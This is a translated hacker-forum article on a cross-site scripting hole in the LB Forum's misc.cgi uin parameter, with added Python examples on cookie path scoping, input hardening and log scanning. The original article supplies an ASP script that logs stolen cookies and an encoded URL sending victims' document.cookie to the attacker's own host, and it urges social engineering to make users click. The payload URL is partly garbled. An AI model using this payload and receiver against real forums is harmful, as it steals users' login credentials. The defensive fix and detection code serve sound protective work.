LB Forum (all versions) Cross-Site Scripting Vulnerability
Author: Like original Article Source: Huaxia Hacker Alliance http://www.77169.org
Friends who are familiar with the LB series of forums may know that LB can handle its cookies in one of two modes: the full-path mode and the root-directory mode. In full-path mode the cookie is stored locally under a path such as www.target.com/cgi-bin, that is, every cookie the forum generates is scoped to the CGI-BIN directory. I think the author designed this with several LB forums running under one domain name in mind; while it achieves that design goal, this option also narrows the reach of cross-site scripting, which makes exploitation a little harder in this mode. So why is this type of vulnerability easy to exploit in root-directory mode? Haha, consider the situation now that cross-site techniques using Flash and images are widespread and the related techniques are gradually maturing. An LB forum generally has two home directories, CGI-BIN and NON-CGI. Almost 99% of the forum's running files live in CGI-BIN, while NON-CGI holds almost all of the static page files and images; the rest of it is files uploaded by users. According to my observations, more than 80% of forums allow users to upload their own portraits or HTML, txt and Flash attachments. So if a forum allows users to upload jpg and GIF images or SWF files, compare the two modes: in root-directory mode all of the forum's cookies are stored for www.target.com, which, unlike www.target.com/cgi-bin, names no specific directory, so the cookie is sent to every directory on the entire site, and a script running from any of them (alert(document.cookie)) can see all the cookie information on that site.
Here I am not even talking about XSS vulnerabilities in the forum itself: carefully constructed image and Flash files alone are enough to reach the goal (how images and Flash are used to achieve cross-site scripting is not discussed in this article; friends who do not know can refer to the relevant information).
Therefore, this article is aimed at sites whose cookie mode is set to the full-path mode; of course, it also applies to sites set to the root-directory mode.
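To make the difference between the two cookie modes concrete, the following added example (not code from this article or from the LB forum; the URLs are constructed for illustration, with the host www.target.com taken from the article) implements the path-matching rule browsers apply to the cookie Path attribute and shows which URLs on the forum host would receive the forum cookie under each mode.

```python
"""Cookie path scoping: why LB's full-path cookie mode narrows what a script
running elsewhere on the host can read.  Added example, not the article's or
the LB forum's own code; sample URLs are constructed."""
from urllib.parse import urlsplit


def path_matches(cookie_path: str, request_path: str) -> bool:
    """Path-match as browsers implement it (RFC 6265, section 5.1.4): the cookie
    is sent only when the request path equals the cookie path or extends it
    at a '/' boundary."""
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    if cookie_path.endswith("/"):
        return True
    return request_path[len(cookie_path)] == "/"


# Constructed sample URLs on one forum host: the forum's own CGI, a user-uploaded
# Flash attachment under NON-CGI, and an unrelated page on the same host.
SAMPLE_URLS = [
    "http://www.target.com/cgi-bin/misc.cgi?action=ICQ&uin=123456",
    "http://www.target.com/non-cgi/attachments/avatar.swf",
    "http://www.target.com/index.html",
]

# The two LB cookie modes described in the article, expressed as Set-Cookie Path values.
COOKIE_MODES = {
    "full_path": "/cgi-bin",  # cookies scoped to the forum's CGI-BIN directory
    "root": "/",              # cookies scoped to the whole site
}


def cookie_exposure(mode: str, urls=SAMPLE_URLS) -> dict:
    """Return {url: bool}: whether a request to (or a script running at) that URL
    would receive the forum cookie under the given mode."""
    cookie_path = COOKIE_MODES[mode]
    return {u: path_matches(cookie_path, urlsplit(u).path) for u in urls}


def exposed_count(mode: str) -> int:
    """Number of sample URLs that receive the forum cookie under the mode."""
    return sum(cookie_exposure(mode).values())


if __name__ == "__main__":
    for mode in COOKIE_MODES:
        print(mode)
        for url, sent in cookie_exposure(mode).items():
            print("  ", "SENT  " if sent else "absent", url)
```

Run it and full-path mode sends the cookie only to the CGI-BIN request, while root mode sends it to all three. One caveat for anyone relying on this: the Path attribute is a convenience, not an isolation boundary. The browser's same-origin policy is drawn per host, not per path, so full-path mode only raises the effort required of an attacker; fixing the unfiltered parameter itself is what closes the hole.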
The problem lies in misc.cgi in the cgi-bin directory. In this CGI file, which implements the ICQ feature of the forum's friends column, the uin variable is not filtered when submitted, and uin is displayed as the ICQ number. A normal submission looks like this:
http://www.target.com/cgi-bin/misc.cgi?action=ICQ&uin=123456
Here 123456 is the ICQ number. If instead the following request is constructed:
http://www.target.com/cgi-bin/misc.cgi?action=ICQ&uin=<SCRIPT>alert(document.cookie)</SCRIPT>
then your cookies on the forum are exposed. How can this be used? First, you need a receiving script that accepts the cookies sent out; of course, the cookies contain the user name and password you are after, and this script can be placed on any space that has its own domain name. A common ASP script is as follows:
Thanks to LCX:
============================================
<%
' Append the value of the MSG query parameter to cookies.txt next to this file
testfile = Server.MapPath("cookies.txt")
msg = Request("MSG")
Set fs = Server.CreateObject("Scripting.File***Object")
' Mode 8 = append; create the file if it does not exist yet
Set thisfile = fs.OpenTextFile(testfile, 8, True, 0)
thisfile.WriteLine("" & msg & "")
thisfile.Close
Set fs = Nothing
%>
Copy this code and save it as XXX.asp, then put it in your own web space. Free space is everywhere ~~ and you will also be given a domain name of however many levels, and plenty of them support ASP :)
Now we can construct the URL for the client. We want the cookie we obtain to be sent to our own space and stored in a TXT file by the script already placed there, so as to obtain the user's information.
The URL the user is made to visit is constructed as follows:
http://www.target.com/cgi-bin/misc.cgi?action=ICQ&uin=%3Cscript%3Ewindow.location.href%3D%2 http://www.sohu.com/XXX.asp?MSG%3D%27%2Bdocument.cookie%3C/script%3E
Then the text file is waiting for you to collect. Here www.sohu.com stands for the location of XXX.asp on your own site, and www.target.com is the URL of the forum you are attacking.
As for how to get users to visit this link, you only need to think about it yourself; what kind of social engineering knowledge ~~ you can use anything, such as your wit, sensitivity and courage, but only for security research. If you use this method to cause damage, I shall not assume any direct or indirect legal responsibility or losses.
After reading this article, some may ask: what if the user does not choose to save the cookie locally, so that his or her cookies are kept only in the current browser process? Are you smart enough to know what to do? :). Have a good time and do not destroy anything.
For friends who are already familiar with XSS, this article may be just one more XSS vulnerability. For newcomers, this article does not thoroughly explain the causes of cross-site scripting; you may need some related knowledge as a basis.
For all friends running the LB forum, it is recommended to delete misc.cgi under the CGI-BIN directory until the official patch comes out, and those who are able should immediately set the cookie mode to the full-path mode, which is set under the forum's basic variables.
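The recommendation above removes misc.cgi; the permanent fix is to stop echoing uin unfiltered. The following added Python example (not the LB forum's own code, which is Perl CGI; the 12-digit bound on the ICQ number and the log lines are my own constructions, and the URLs reuse the article's www.target.com) shows the unfiltered rendering the article describes beside a hardened version that allow-lists the value and HTML-encodes it, plus a small log check that flags misc.cgi requests whose uin is not a plain number, for an administrator who wants to see whether the forum has already been probed.

```python
"""misc.cgi's ICQ display: the unfiltered echo the article describes, a hardened
version, and a log check.  Added example, not the LB forum's code."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# ICQ numbers are purely numeric; the 1-12 digit bound is an assumption for this example.
ICQ_UIN_RE = re.compile(r"^[0-9]{1,12}$")
SCRIPT_TAG_RE = re.compile(r"<\s*script", re.IGNORECASE)
# Request line inside a common-format web server log entry: "GET /path?query HTTP/1.x"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def uin_from_url(url: str) -> str:
    """Return the percent-decoded uin query parameter, as the CGI would see it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("uin", [""])[0]


def render_icq_unsafe(uin: str) -> str:
    """The behaviour the article describes: the value is echoed into HTML as-is."""
    return f"<p>ICQ: {uin}</p>"


def render_icq_safe(uin: str) -> str:
    """Hardened version: allow-list the value, then HTML-encode what is echoed.
    Encoding is kept even after validation so that a later loosening of the
    allow-list cannot reintroduce markup injection."""
    if not ICQ_UIN_RE.match(uin):
        return "<p>ICQ: (invalid number)</p>"
    return f"<p>ICQ: {html.escape(uin, quote=True)}</p>"


def handle_request(url: str, safe: bool = True) -> str:
    """Render the ICQ line for a misc.cgi request URL, safely by default."""
    renderer = render_icq_safe if safe else render_icq_unsafe
    return renderer(uin_from_url(url))


def injects_script(rendered_html: str) -> bool:
    """True if the rendered page now carries a script tag taken from the input."""
    return SCRIPT_TAG_RE.search(rendered_html) is not None


def suspicious_uin_requests(log_lines) -> list:
    """Flag misc.cgi requests whose uin is not a plain number.  The value is
    percent-decoded first so encoded tags are not missed.  Returns (url, uin) pairs."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = m.group(1)
        if not urlsplit(url).path.endswith("/misc.cgi"):
            continue
        uin = uin_from_url(url)
        if uin and not ICQ_UIN_RE.match(uin):
            hits.append((url, uin))
    return hits


# Constructed sample requests: a normal one and the injected one from the article.
NORMAL_URL = "http://www.target.com/cgi-bin/misc.cgi?action=ICQ&uin=123456"
INJECTED_URL = ("http://www.target.com/cgi-bin/misc.cgi?action=ICQ"
                "&uin=%3Cscript%3Ealert(document.cookie)%3C/script%3E")

# Constructed log lines in common log format; only the second one is a probe.
SAMPLE_LOG = [
    '10.0.0.1 - - [01/Jan/2003:10:00:00 +0800] "GET /cgi-bin/misc.cgi?action=ICQ&uin=123456 HTTP/1.0" 200 512',
    '10.0.0.2 - - [01/Jan/2003:10:00:05 +0800] "GET /cgi-bin/misc.cgi?action=ICQ'
    '&uin=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.0" 200 640',
    '10.0.0.3 - - [01/Jan/2003:10:00:09 +0800] "GET /non-cgi/index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    print("unfiltered:", handle_request(INJECTED_URL, safe=False))
    print("hardened:  ", handle_request(INJECTED_URL))
    for url, uin in suspicious_uin_requests(SAMPLE_LOG):
        print("suspicious uin in", url, "->", uin)
```

The allow-list is the real control here: an ICQ number has no business containing anything but digits, so rejecting everything else removes the injection surface entirely, and the HTML encoding is defence in depth for the day someone widens the check. The log scan applies the same rule to recorded requests, which is the quickest way to tell whether the unfiltered parameter has already been exercised on a given forum.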